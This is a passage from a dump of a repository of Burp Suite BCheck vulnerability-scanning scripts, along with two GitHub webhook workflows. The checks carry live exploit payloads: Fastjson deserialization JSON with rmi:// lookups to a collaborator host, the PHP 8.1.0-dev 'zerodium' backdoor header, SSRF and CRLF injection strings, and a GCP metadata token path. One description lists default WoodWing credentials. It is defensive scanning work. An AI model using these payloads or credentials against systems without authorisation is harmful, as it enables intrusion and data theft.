"Authorization: $AUTH_TOKEN" -d "$AUTHOR"$'\n'"$TITLE"$'\n'"$LINK" 16 | env: 17 | AUTHOR: ${{ github.event.issue.user.login }} 18 | TITLE: ${{ github.event.issue.title }} 19 | LINK: ${{ github.event.issue.html_url }} 20 | WEBHOOK: ${{ secrets.WEBHOOK_URL }} 21 | AUTH_TOKEN: ${{ secrets.AUTH_TOKEN }} 22 | 23 | -------------------------------------------------------------------------------- /.github/workflows/pr_webhook.yml: -------------------------------------------------------------------------------- 1 | name: Pull Request Webhook 2 | 3 | on: 4 | pull_request_target: 5 | types: [opened, reopened] 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | 11 | steps: 12 | - name: Push to webhook 13 | run: | 14 | echo $AUTHOR $TITLE $LINK 15 | curl "$WEBHOOK" -X POST -H "Authorization: $AUTH_TOKEN" -d "$AUTHOR"$'\n'"$TITLE"$'\n'"$LINK" 16 | env: 17 | AUTHOR: ${{ github.event.pull_request.user.login }} 18 | TITLE: ${{ github.event.pull_request.title }} 19 | LINK: ${{ github.event.pull_request.html_url }} 20 | WEBHOOK: ${{ secrets.WEBHOOK_URL }} 21 | AUTH_TOKEN: ${{ secrets.AUTH_TOKEN }} 22 | -------------------------------------------------------------------------------- /other/JavaScript/malicious_polyfill_cdn.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Malicious Polyfill CDN In Use" 4 | description: "Look in responses to see if there are malicious Polyfill CDNs is in use" 5 | author: "KnugiHK" 6 | tags: "passive","javascript" 7 | 8 | given response then 9 | if {latest.response.body} matches "" then 10 | report issue: 11 | severity: high 12 | confidence: firm 13 | detail: "The malicious Polyfill CDN polyfill.io is used on the website." 14 | remediation: "Self-host a Polyfill service or use a more reliable CDN." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/aws-session-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS Session Token" 4 | description: "Looks for AWS session token exposure in page source." 5 | author: "@puzzlepeaches" 6 | tags: "aws","amazon","token","exposure","session" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)(?:aws.?session|aws.?session.?token|aws.?token)[\"'`]?\s{0,30}(?::|=>|=)\s{0,30}[\"'`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "AWS Session token exposure found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/microsoft-teams-webhook.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Microsoft Teams Webhook Disclosure" 4 | description: "Detects a Microsoft Teams Webhook disclosure in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "microsoft" 7 | 8 | given response then 9 | if {latest.response} matches "https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Microsoft Teams Webhook disclosed in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/prometheus/exposed-prometheus-metrics.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Prometheus Metrics Publicly Available" 4 | description: "Prometheus Metrics Found" 5 | author: "Sourav Kalal" 6 | 7 | define: 8 | potential_path = "/metrics" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if {check.response.status_code} is "200" and "memory" in {check.response.body} then 16 | report issue: 17 | severity: low 18 | confidence: certain 19 | detail: `Prometheus Metrics found at {potential_path}.` 20 | remediation: "Ensure your Prometheus Metrics is not exposed." 21 | end if 22 | -------------------------------------------------------------------------------- /other/apache-mod_info.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Apache mod_info" 4 | description: "Check for Apache's mod_info pages" 5 | author: "pyllyukko" 6 | 7 | run for each: 8 | potential_path = 9 | "/server-status", 10 | "/server-info" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if {check.response.status_code} is "200" and "Apache Server" in {check.response.body} then 18 | report issue: 19 | severity: info 20 | confidence: certain 21 | detail: `Apache's mod_info page found at {potential_path}.` 22 | remediation: "Disable Apache's mod_info module." 23 | end if 24 | -------------------------------------------------------------------------------- /vulnerability-classes/injection/CRLFInjection.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CRLF Injection" 4 | description: "Checks for CRLF Injection" 5 | author: "0xGodson_" 6 | 7 | define: 8 | nonce = `{random_str(13)}` 9 | 10 | given request then 11 | send request called crlf: 12 | appending path: `%0d%0aX-TEST-Header:%20{nonce}%0d%0a` 13 | 14 | if `x-test-header: {to_lower({nonce})}` in {to_lower({crlf.response.headers})} then 15 | report issue: 16 | severity: low 17 | confidence: certain 18 | detail: "The application is vulnerable to CRLF Injection." 19 | remediation: "Strip any newline characters before passing content into the HTTP header." 20 | end if 21 | -------------------------------------------------------------------------------- /examples/exposed-git-directory.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Host-level" 4 | description: "Tests for exposed git directory" 5 | author: "Carlos Montoya" 6 | 7 | run for each: 8 | # you could add more values to this list to make the check repeat 9 | potential_path = "/.git/config", "/.git/config~" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if "[core]" in {check.response.body} then 17 | report issue: 18 | severity: info 19 | confidence: certain 20 | detail: `Git directory found at {potential_path}.` 21 | remediation: "Ensure your git directories are not exposed." 22 | end if 23 | -------------------------------------------------------------------------------- /other/PHP Laravel Debug Mode enabled.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "PHP Laravel Debug Mode enabled" 4 | description: "PHP Laravel with debug method enabled which shows the verbose error message" 5 | author: "Sourav Kalal" 6 | 7 | define: 8 | potential_path = "/_ignition/health-check" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if {check.response.status_code} is "200" and "execute_command" in {check.response.body} then 16 | report issue: 17 | severity: medium 18 | confidence: certain 19 | detail: `PHP Laravel Debug Mode enabled.` 20 | remediation: "Ensure your APP_DEBUG is set to False." 21 | end if 22 | -------------------------------------------------------------------------------- /other/technologies/WoodWing-Detect.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Detect WoodWing Studio Server Panel" 4 | description: "Default creds: username: woodwing password: ww" 5 | author: "xelkomy" 6 | 7 | define: 8 | potential_path = "/StudioServer/server/apps/login.php" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if "WoodWing Studio Server" in {check.response.body} then 16 | report issue: 17 | severity: info 18 | confidence: certain 19 | detail: `WoodWing Studio Server Panel at {potential_path}.` 20 | remediation: "Maybe there is defult creds impact Default creds: username: woodwing password: ww." 21 | end if -------------------------------------------------------------------------------- /other/recon/backend-language.bcheck: -------------------------------------------------------------------------------- 1 | #Verified: Yes 2 | metadata: 3 | language: v1-beta 4 | name: "Backend-language" 5 | description: "Passive scan for the programming language used by the backend" 6 | author: "Brumens" 7 | tags: "passive", "live", "backend", "recon", "info", "lang", "language" 8 | 9 | define: 10 | desc = "The programming language of the application has been discovered" 11 | #reme = "" 12 | 13 | given response then 14 | if {latest.response} matches "href(| )=(| )[\"'](?!((http[s]?:)?\/\/))[^\"'\r\n]+\.(php|asp(|x)|jsp|cfm|java|rb|py|go|erlang)([?#;&][^\"'\r\n]+|)[\"']" then 15 | report issue: 16 | severity: info 17 | confidence: firm 18 | detail: {desc} 19 | #remediation: {reme} 20 | end if 21 | -------------------------------------------------------------------------------- /other/takeover-shopify.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify subdomain takeover" 4 | description: "Possible sub-domain takeover | Shopify" 5 | tags: "passive,shopify,takeover,cloud" 6 | author: "Milad Fadavvi" 7 | 8 | 9 | given response then 10 | if ("To finish setting up your new web address, go to your domain settings, click \"Connect existing domain\"" in {latest.response} or "Sorry, this shop is currently unavailable." in {latest.response}) and "shop-not-found" in {latest.response} then 11 | report issue: 12 | severity: high 13 | confidence: firm 14 | detail: "info --> https://github.com/EdOverflow/can-i-take-over-xyz/issues/46" 15 | remediation: "Delete the related DNS record." 16 | end if 17 | -------------------------------------------------------------------------------- /other/files/configs/gitlab-ci-discovery.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "GitLab CI Exposure" 4 | description: "Tests for exposed GitLab CI files" 5 | author: "Patrick Harrison" 6 | tags: "exposure", "gitlab", "config", "file" 7 | 8 | run for each: 9 | potential_path = "/.gitlab-ci.yml" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if "stage" in {check.response.body} then 17 | report issue: 18 | severity: low 19 | confidence: firm 20 | detail: `GitLab CI file found at {check.request.url}` 21 | remediation: "Ensure your configuration files are not exposed." 22 | end if 23 | -------------------------------------------------------------------------------- /other/tokens/slack-webhook-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Slack Webhook Disclosure" 4 | description: "Detects exposed Slack Webhook URLs in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "slack" 7 | 8 | given response then 9 | if {latest.response} matches "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Slack webhook URL found in page source. Inappropriate disclosure of such URLs can lead to unauthorized messages being sent to the associated Slack channel." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/gcp.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Response-level" 4 | description: "Checking GCP Service Account Access Token via SSRF" 5 | tags: "GCP", "SSRF" 6 | author: "Joe Thiha" 7 | 8 | define: 9 | potential_path = "http://metadata.google.internal/computeMetada/v1/instance/service-accounts/default/token" 10 | 11 | given insertion point then 12 | send payload: 13 | appending: {potential_path} 14 | 15 | if {latest.response.status_code} is "200" then 16 | if("access_token:" in {latest.response.body})then 17 | report issue: 18 | severity: high 19 | confidence: firm 20 | detail: "Leaked GCP Service Account Access Token via SSRF." 21 | remediation: "Restrict access to the metadat url." 22 | end if 23 | end if 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /other/tokens/tugboat-config-exposure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Tugboat Configuration File Exposure" 4 | description: "A Tugboat configuration file was discovered. Tugboat is a command line tool for interacting with DigitalOcean droplets." 5 | author: "@puzzlepeaches" 6 | tags: "tugboat","config","exposure" 7 | 8 | given response then 9 | if {latest.response} matches "access_token: .*" then 10 | if {latest.response} matches "authentication" and {latest.response} matches "access_token" and {latest.response} matches "ssh_user" then 11 | report issue: 12 | severity: low 13 | confidence: tentative 14 | detail: "Tugboat configuration file was discovered. Tugboat is a command line tool for interacting with DigitalOcean droplets." 15 | end if 16 | end if -------------------------------------------------------------------------------- /vulnerability-classes/injection/SSRFInjection.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "SSRF in each insetpoint" 4 | description: "Insert an Collaborator address into each parameter to detect SSRF" 5 | author: "xelkomy" 6 | 7 | define: 8 | ssrfaddress=`{generate_collaborator_address()}` 9 | 10 | # we will automatically insert into nested insertion points 11 | given insertion point then 12 | send payload: 13 | appending: {ssrfaddress} 14 | 15 | if http interactions then 16 | report issue: 17 | severity: high 18 | confidence: firm 19 | detail: "SSRF Discovery by BCheck: Explore the Request Tab to Observe the Payload and Attempt Self-Capture" 20 | remediation: "Implement SSRF remediation measures to mitigate the vulnerability." 21 | end if 22 | -------------------------------------------------------------------------------- /other/Cookie-SameSite-Disabled.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "SameSite attribute was set to None" 4 | description: "Detect when a cookie set the SameSite attribute to None." 5 | author: "Dominique Righetto" 6 | tags: "passive","informative" 7 | 8 | given response then 9 | # Source: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#samesitesamesite-value 10 | if {latest.response} matches "(?i)(SameSite=None)" then 11 | report issue: 12 | severity: info 13 | confidence: firm 14 | detail: "The SameSite security attribute is set to None so the protection is disabled." 15 | remediation: "It is recommended to use the value Lax or Strict for the SameSite attribute to leverage the protection provided." 16 | end if 17 | -------------------------------------------------------------------------------- /other/missing-security-txt.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Missing security.txt" 4 | description: "Checks for a missing security.txt according to RFC 9116" 5 | author: "Patrick Schmid" 6 | 7 | define: 8 | potential_path = 9 | "/.well-known/security.txt" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if not("Contact:" in {check.response.body}) then 17 | report issue: 18 | severity: info 19 | confidence: certain 20 | detail: `No security.txt could be found at {potential_path}.` 21 | remediation: "Consider describing your security vulnerability disclosure process in a security.txt file according to RFC 9116 (https://www.rfc-editor.org/rfc/rfc9116)." 22 | end if 23 | -------------------------------------------------------------------------------- /other/Apache Struts OGNL Console Publicly Accessible.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Apache Struts OGNL Console Publicly Accessible" 4 | description: "Apache Struts OGNL Console is public and could be exploited to gain access" 5 | author: "Sourav Kalal" 6 | 7 | define: 8 | potential_path = "/struts/webconsole.html?debug=console" 9 | 10 | given host then 11 | send request called check: 12 | method: "GET" 13 | path: {potential_path} 14 | 15 | if {check.response.status_code} is "200" and "title>OGNL Console" in {check.response.body} then 16 | report issue: 17 | severity: low 18 | confidence: firm 19 | detail: `Apache Struts OGNL Console found at {potential_path}.` 20 | remediation: "Restrict access to the struts console." 21 | end if 22 | -------------------------------------------------------------------------------- /other/shiro/shiro_active.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shiro Cookie Check Active" 4 | description: "Detects Shiro Vulnerability by Manipulating Cookie" 5 | author: "timeshatter" 6 | tags: "Shiro,active" 7 | 8 | define: 9 | shiroExploit = "rememberMe=1" 10 | issueDetail = "Shiro Cookie Exploit Detected: rememberMe=deleteMe" 11 | issueRemediation = "Immediately investigate and fix the Shiro vulnerability." 12 | 13 | given request then 14 | send request called check: 15 | replacing headers: 16 | "Cookie": {shiroExploit} 17 | 18 | if "rememberMe=deleteMe" in {check.response} then 19 | report issue: 20 | severity: info 21 | confidence: certain 22 | detail: {issueDetail} 23 | remediation: {issueRemediation} 24 | end if 25 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-11759-Apache mod_jk access control bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2018-11759 - Apache mod_jk access control bypass" 4 | description: "Checks for CVE-2018-11759 -Apache mod_jk access control bypass" 5 | author: "CDonkin" 6 | tags: "CVE-2018-11759", "mod_jk" 7 | 8 | run for each: 9 | potential_path = 10 | "/jkstatus", 11 | "/jkstatus;" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if "JK Status Manager" in {check.response.body} then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: `jkstatus found at {potential_path}.` 23 | remediation: "Apply the relevant patches" 24 | end if 25 | 26 | -------------------------------------------------------------------------------- /other/files/configs/git-config-discovery.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Git Configuration Check" 4 | description: "Tests for exposed git config in current path as opposed to just root directory of site." 5 | author: "github.com/BuffaloWill" 6 | tags: "exposure", "git", "config", "file" 7 | 8 | run for each: 9 | potential_path = 10 | ".git/config", 11 | ".git/config~" 12 | 13 | given request then 14 | send request called check: 15 | method: "GET" 16 | replacing path: `{regex_replace({regex_replace({base.request.url},"^.*?\/.*?\/.*?\/","/")},"([^/]+)$", "")}{potential_path}` 17 | 18 | if "[core]" in {check.response.body} then 19 | report issue: 20 | severity: low 21 | confidence: tentative 22 | detail: `Git configuration found at {potential_path}.` 23 | end if -------------------------------------------------------------------------------- /other/exposed-simple-saml-php-ui.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Simple SAML php Admin Interface" 4 | description: "Tests for exposed admin interface of Simple SAML php" 5 | author: "Patrick Schmid" 6 | 7 | run for each: 8 | potential_path = 9 | "/saml/module.php/core/login-admin.php?ReturnTo=", 10 | "/sso/module.php/core/login-admin.php?ReturnTo=" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "loginuserpass.php" in {check.response.body} then 18 | report issue: 19 | severity: info 20 | confidence: certain 21 | detail: `Simple SAML php admin interface found at {potential_path}.` 22 | remediation: "Ensure your Simple SAML php admin interface is not exposed." 23 | end if 24 | -------------------------------------------------------------------------------- /other/files/000~ROOT~000-exposed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Filesystem exposure via /home/000~ROOT~000/" 4 | description: "Tests for exposed 000~ROOT~000 in current path and at the root directory of site" 5 | author: "r3nt0n" 6 | tags: "active", "exposure", "path traversal" 7 | 8 | run for each: 9 | payloads_array = 10 | "/home/000~ROOT~000/", 11 | `{regex_replace(base.request.url.path, "/$", "")}/home/000~ROOT~000/` 12 | 13 | given path then 14 | send request: 15 | replacing method: "GET" 16 | replacing path: `{payloads_array}` 17 | 18 | if "Index of" in {latest.response} then 19 | report issue: 20 | severity: high 21 | confidence: firm 22 | detail: "Potential exposure of entire filesystem via \"/home/000~ROOT~000\" path" 23 | end if 24 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-22978-spring_security_auth_bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-22978 Spring Security Authorization Bypass" 4 | description: "find CVE-2022-22978 Spring Security Authorization Bypass" 5 | author: "timeshatter" 6 | tags: "Spring Security Authorization Bypass","CVE-2022-22978" 7 | 8 | given request then 9 | if {base.response.status_code} is "403" then 10 | send request called check: 11 | appending path: "%0a" 12 | 13 | if {check.response.status_code} is "200" then 14 | report issue: 15 | severity: high 16 | confidence: tentative 17 | detail: "find CVE-2022-22978 Spring Security Authorization Bypass" 18 | remediation: "update Spring Security Authorization." 19 | end if 20 | end if 21 | -------------------------------------------------------------------------------- /other/Blind-SSRF-By-Collaborator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Blind SSRF By Collaborator" 4 | description: "Blind SSRF with proxy param or url param" 5 | author: "Jumbo@chinabaiker.com" 6 | 7 | define: 8 | proxy_ssrf = `http://{generate_collaborator_address()}/proxy` 9 | url_ssrf = `https://{generate_collaborator_address()}/url` 10 | 11 | given request then 12 | send request: 13 | appending queries: 14 | `proxy={proxy_ssrf}`, 15 | `url={url_ssrf}` 16 | if http interactions then 17 | report issue: 18 | severity: high 19 | confidence: firm 20 | detail: "The site request url params or proxy params, There may be ssrf vulnerabilities." 21 | remediation: "Ensure that the site does not directly request URLs from the proxy param or url param." 22 | end if 23 | 24 | -------------------------------------------------------------------------------- /other/configs/apache-airflow-config-exposure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Apache Airflow Configuration Page" 4 | description: "Apache Airflow configuration page was detected" 5 | author: "Nithissh" 6 | 7 | run for each: 8 | # you could add more values to this list to make the check repeat 9 | potential_path = 10 | "airflow.cfg" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "[core]" in {check.response.body} and "[api]" in {check.response.body} then 18 | report issue: 19 | severity: medium 20 | confidence: certain 21 | detail: `Apache airflow configuration page found on {potential_path}.` 22 | remediation: "Ensure your Apache airflow configuration page are not exposed." 23 | end if 24 | -------------------------------------------------------------------------------- /other/php-8.1.0-dev-backdoor.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "PHP 8.1.0-dev Backdoor - Code Injection" 4 | description: "Detect servers running PHP 8.1.0-dev, which was released with a backdoor allowing Code Injection" 5 | author: "r3nt0n" 6 | tags: "active", "php", "code injection", "backdoor" 7 | 8 | define: 9 | payload = "zerodiumvar_dump(1337*1337)" 10 | 11 | given host then 12 | send request: 13 | appending headers: 14 | "User-Agentt": `{payload};` 15 | 16 | if "int(1787569)" in {latest.response} then 17 | report issue: 18 | severity: high 19 | confidence: firm 20 | detail: `Code injection via backdoor introduced in PHP 8.1.0-dev: 21 | 22 | - https://news-web.php.net/php.internals/113838 23 | - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/` 24 | end if 25 | -------------------------------------------------------------------------------- /other/IBM Websphere Source File Publicly Accessible.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "IBM Websphere Portal Information Disclosure" 4 | description: "IBM Websphere Source File Publicly Accessible " 5 | author: "Sourav Kalal" 6 | 7 | run for each: 8 | potential_path = 9 | "/iojs/%2e/WEB-INF/web.xml", 10 | "/iojs/%2e/WEB-INF/", 11 | "/iojs/%2e/META-INF/" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" and "web-app" in {check.response.body} or "servlet" in {check.response.body} then 19 | report issue: 20 | severity: medium 21 | confidence: firm 22 | detail: `IBM Websphere Source File found at {potential_path}.` 23 | remediation: "Upgrade the WebSphere Portal." 24 | end if 25 | -------------------------------------------------------------------------------- /other/ntlm-authentication-discovery.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NTLM Authentication Detection" 4 | description: "Detects NTLM authentication on non-standard directories." 5 | author: "@puzzlepeaches" 6 | tags: "login", "ntlm", "authentication" 7 | 8 | given request then 9 | send request called check: 10 | method: "GET" 11 | appending headers: 12 | "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAgAAAAAAAAACAAAAA=" 13 | 14 | if {check.response.status_code} is "401" and {check.response.headers} matches "WWW-Authenticate: NTLM" then 15 | report issue: 16 | severity: low 17 | confidence: firm 18 | detail: "NTLM authentication is enabled on a non-standard directory." 19 | remediation: "Disable NTLM authentication in favor of modern authentication protocols." 20 | end if -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.62-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.62 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://{generate_collaborator_address()}/{random_str(4)}"}` 10 | 11 | given request then 12 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 13 | send request: 14 | body: {payload} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "https://paper.seebug.org/1192/." 21 | remediation: "https://paper.seebug.org/1192/." 22 | end if 23 | end if 24 | -------------------------------------------------------------------------------- /other/configs/dockerrun-aws-config-page-exposure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Dockerrun AWS Configuration Page Exposed" 4 | description: "Dockerrun AWS configuration page was detected" 5 | author: "Nithissh" 6 | 7 | run for each: 8 | # you could add more values to this list to make the check repeat 9 | potential_path = 10 | "/Dockerrun.aws.json" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "AWSEBDockerrunVersion" in {latest.response} and "containerDefinitions" in {latest.response} then 18 | report issue: 19 | severity: medium 20 | confidence: certain 21 | detail: `Dockerrun AWS configuration page exposed on {potential_path}.` 22 | remediation: "Make sure to disable the configuration page to public" 23 | end if 24 | -------------------------------------------------------------------------------- /other/go debug pprof exposed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "go debug pprof exposed" 4 | description: "go /debug/pprof is exposed this endpoint can leak sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "go", "debug", "exposure" 7 | 8 | run for each: 9 | potential_path = "/debug/pprof" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if {check.response.status_code} is "200" and "Types of profiles available:" in {check.response.body} and "text/html" in {check.response.headers} then 17 | report issue: 18 | severity: medium 19 | confidence: certain 20 | detail: `go /debug/pprof is exposed this endpoint can leak sensitive information` 21 | remediation: "Restrict access to /debug/pprof/ endpoint" 22 | end if 23 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2001-0537 CISCO Authentication Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2001-0537 CISCO Authentication Bypass" 4 | description: "Checks for CVE-2001-0537" 5 | author: "Ollie Whitehouse" 6 | tags: "CVE-2001-0537 CVE" 7 | 8 | define: 9 | potential_path = 10 | "/level/16/exec/show%20privilege" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | # Checks that we get a 200 AND that the output we expect in the result 18 | if {check.response.status_code} is "200" and "Current privilege level is" in {check.response.body} then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "Router is vulnerable to the authentication bypass vulnerability CVE-2001-0537" 23 | remediation: "Patch to a non vulnerable version" 24 | end if 25 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.41-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.41 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = `\{"@type":"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}` 10 | 11 | given request then 12 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 13 | send request: 14 | body: {payload} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "https://paper.seebug.org/1192/." 21 | remediation: "https://paper.seebug.org/1192/." 22 | end if 23 | end if 24 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.24-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.24 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload = 10 | `\{"b":\{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}","autoCommit":true}}` 11 | 12 | given request then 13 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 14 | send request: 15 | body: {payload} 16 | 17 | if dns interactions then 18 | report issue: 19 | severity: high 20 | confidence: certain 21 | detail: "https://paper.seebug.org/1192/." 22 | remediation: "https://paper.seebug.org/1192/." 23 | end if 24 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot heapdump actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot heapdump actuator" 4 | description: "Springboot heapdump actuator provides a heap dump from the application's JVM" 5 | author: "psytester" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/heapdump", 11 | "/actuator/heapdump", 12 | "/api/actuator/heapdump" 13 | 14 | given host then 15 | send request called check: 16 | method: "GET" 17 | path: {potential_path} 18 | 19 | if {check.response.status_code} is "200" 20 | and "application/octet-stream" in {check.response.headers} then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: `Springboot heapdump actuator found at {potential_path}.` 25 | remediation: "Ensure heapdump actuator is not exposed." 26 | end if 27 | -------------------------------------------------------------------------------- /other/SAP Directory Listing.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "SAP Directory Listing" 4 | author: "Parimal Shaw" 5 | description: "Within SAP NetWeaver, directory listing is enabled." 6 | tags: "SAP NetWeaver Misconfiguration" 7 | 8 | define: 9 | potential_path = "/irj/go/km/navigation/" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | 18 | if {check.response.status_code} is "200" 19 | and "title=\"~system\"" in {check.response.body} 20 | and "NetWeaver" in {check.response.body} 21 | and "text/html" in {check.response.headers} then 22 | report issue: 23 | severity: medium 24 | confidence: certain 25 | detail: "In SAP NetWeaver the directory listing is enabled or not configured properly." 26 | remediation: "Ensure to Disable directory listing." 27 | end if -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.43-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.43 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | 